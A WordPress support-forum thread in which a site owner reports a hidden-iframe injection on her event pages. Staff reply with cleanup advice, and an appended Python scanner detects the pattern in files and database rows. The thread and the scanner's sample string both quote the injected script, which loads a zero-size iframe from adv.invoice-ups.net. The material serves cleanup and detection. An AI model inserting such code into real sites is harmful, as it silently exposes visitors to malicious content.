

Phishing attack on event page, plugin causes malicious backup file

Posted: November 21, 2014 at 1:45 pm


Natalie Parisi

November 21, 2014 at 1:45 pm

Current site stats:
WordPress 4.0.1
Event Espresso 4.4.5p, no add-ons
WordPress auto-updated last night, then problem occurred, then EE4 upgraded and re-installed
Domain: shinteki.com

Our site running EE4 was attacked with some phishing code after the latest WordPress auto update last night. We’re trying to get things cleaned up so we can get the site cleared with Google.

Google reported that our compromised pages were our main page and the one event page we have generated through EE. These pages were injected with code from combatwriter.com, invoice-ups.net, and sweetcakesweb.net. We found and deleted the following code from wp-blog-header.php and haven’t been able to find any other references or unusual files anywhere else:

<!-- counter --><script language=javascript>status=location;document.write('<iframe src="http://adv.invoice-ups.net/stats.php" width="0" height="0" frameborder="0"></iframe>');</script><!-- counter -->

Things get a little tricky here, but these were my next basic steps trying to clean up any potential bad files in WordPress:

1. Updated all plug-ins
2. Installed Sucuri Security plug-in. Scan shows no malicious files.
3. Made a backup .zip using All-in-One WP Migration plugin. Chrome warns the backup .zip is malicious when I download it.
4. Deleted all WordPress files and did fresh re-installation.
5. Restored the backup file using All-in-One WP Migration plugin
6. Restoration caused errors in EE4 plugin. Deleted EE4. Errors stopped.
7. Generated a new backup .zip with All-in-One WP Migration and downloaded. This time, no Chrome warning about the file being malicious.
8. Re-installed EE4 via the WP plugin upload interface (plugin .zip downloaded directly from EE website). No errors this time.
9. Generated a new backup .zip with All-in-One WP Migration, but when I tried to download it, Google Chrome warned me that the file was malicious.
10. Sucuri Security scan still shows no malicious files on the site.

Using the All-in-One WP Migration as sort of a litmus test, the change from a non-malicious backup file to a malicious one only after EE4 is re-installed makes me wonder whether something in EE4 is involved with our phishing attack and is still an issue. Our EE4 was a few versions out of date when the attack happened, so I’m wondering if that had something to do with it.

Any guidance you have on this issue would be greatly appreciated. We don’t have much experience with WordPress hacking and want to make sure we get everything cleared up properly.


Josh

  • Support Staff

November 21, 2014 at 3:17 pm

Hi Natalie,

EE4 is not involved with the phishing attack. Other sites that do not run EE4 have reported the same attack where a general backdoor vulnerability allowed access to the web server and the attacker injected their scripts into post content. In your case, some iframe code was injected into an event page and your main page.

This is an attack that’s been around before Event Espresso was available as a plugin. Here is a link to notable discussion on this iframe hack vulnerability that was posted in the WordPress.org forums five years ago:

https://wordpress.org/support/topic/iframe-hack-on-several-wp-sites

If your backup files include a backup of the database, and if the database has the injected iframe code, then the database needs to be cleaned up as well. I recommend contacting Sucuri or another reputable developer who specializes in cleaning up sites to make sure things get cleaned up.

I can also recommend running scans on the PCs that FTP in or log in to your WordPress site. It’s also important to change the passwords for the WordPress and FTP logins.
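Josh's point that the injection can live in the database as well as in PHP files is the reason a file-only scan (like the one Natalie ran) can come back clean while the backup still trips the browser's download check. The script below is an added example, not code from this thread, from Event Espresso or from Sucuri: it looks for the hidden 0x0 iframe pattern quoted above (the `<!-- counter -->` marker and the `status=location;document.write(...)` trick) both in a tree of site files and in rows of post content as you would pull them from `wp_posts` (for example `SELECT ID, post_content FROM wp_posts`). The sample files and posts it scans are constructed inline so it runs offline; the paths, post IDs and the hostnames in the samples are assumptions for the demonstration, except the adv.invoice-ups.net URL, which is the one quoted in the original post.

```python
import os
import re
import tempfile
from urllib.parse import urlparse

# Pattern quoted in the thread: a zero-size iframe written from JavaScript.
# Matches the tag whether it appears as raw HTML or inside a JS string literal.
IFRAME_RE = re.compile(r'<iframe\s[^>]*src=["\']?(https?://[^"\'\s>]+)[^>]*>',
                       re.IGNORECASE)
# Heuristics for "hidden": a 0 width/height, or the injector's marker text
# shortly before the tag. Legitimate embeds rarely look like this.
HIDDEN_RE = re.compile(r'(?:width|height)\s*=\s*["\']?0["\']?', re.IGNORECASE)
MARKER_RE = re.compile(r'<!--\s*counter\s*-->|status\s*=\s*location\s*;\s*document\.write',
                       re.IGNORECASE)

# Constructed samples (the iframe URL is the one quoted in the post above).
SAMPLE_INJECTION = ('<!-- counter --><script language=javascript>status=location;'
                    'document.write(\'<iframe src="http://adv.invoice-ups.net/stats.php" '
                    'width="0" height="0" frameborder="0"></iframe>\');</script><!-- counter -->')
CLEAN_POST = ('<p>Tickets for the event.</p>'
              '<iframe src="https://www.youtube.com/embed/example" width="560" height="315"></iframe>')


def find_injections(text):
    """Return [(hostname, snippet)] for each suspicious hidden iframe in text."""
    hits = []
    for m in IFRAME_RE.finditer(text):
        tag = m.group(0)
        context = text[max(0, m.start() - 200):m.start()]
        if HIDDEN_RE.search(tag) or MARKER_RE.search(context):
            hits.append((urlparse(m.group(1)).hostname, tag[:80]))
    return hits


def scan_tree(root, exts=(".php", ".html", ".htm", ".js")):
    """Walk a site directory; return {path: hits} for files that contain injections."""
    found = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = find_injections(fh.read())
            if hits:
                found[path] = hits
    return found


def scan_posts(rows):
    """rows: iterable of (post_id, post_content), e.g. from wp_posts. Return {id: hits}."""
    return {post_id: hits for post_id, content in rows
            if (hits := find_injections(content or ""))}


def demo():
    """Constructed site: one injected core file, one injected post, rest clean."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "wp-includes"))
        with open(os.path.join(root, "wp-includes", "functions.php"), "w") as fh:
            fh.write("<?php function wp_ok() { return 1; }\n")
        with open(os.path.join(root, "wp-blog-header.php"), "w") as fh:
            fh.write("<?php require 'wp-load.php'; ?>\n" + SAMPLE_INJECTION)
        files = {os.path.relpath(p, root): h for p, h in scan_tree(root).items()}
    # Hypothetical post rows; ID 7 stands in for the injected event page.
    posts = scan_posts([(5, CLEAN_POST), (7, "<p>Event page</p>" + SAMPLE_INJECTION)])
    return {"files": files, "posts": posts}


if __name__ == "__main__":
    for kind, hits in demo().items():
        for where, matches in hits.items():
            print(kind, where, sorted({host for host, _ in matches}))
```

Run it against the real site by calling `scan_tree("/path/to/wordpress")` and feeding `scan_posts` the rows of `wp_posts` (and `wp_options`, which attackers also use). Every hit in the database is a row the file re-install and the Sucuri file scan will never touch, which is exactly why the restored backup kept failing Chrome's check; clean those rows, then rotate the WordPress and FTP passwords as Josh advises, since the injection only tells you where the attacker wrote, not how they got in.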
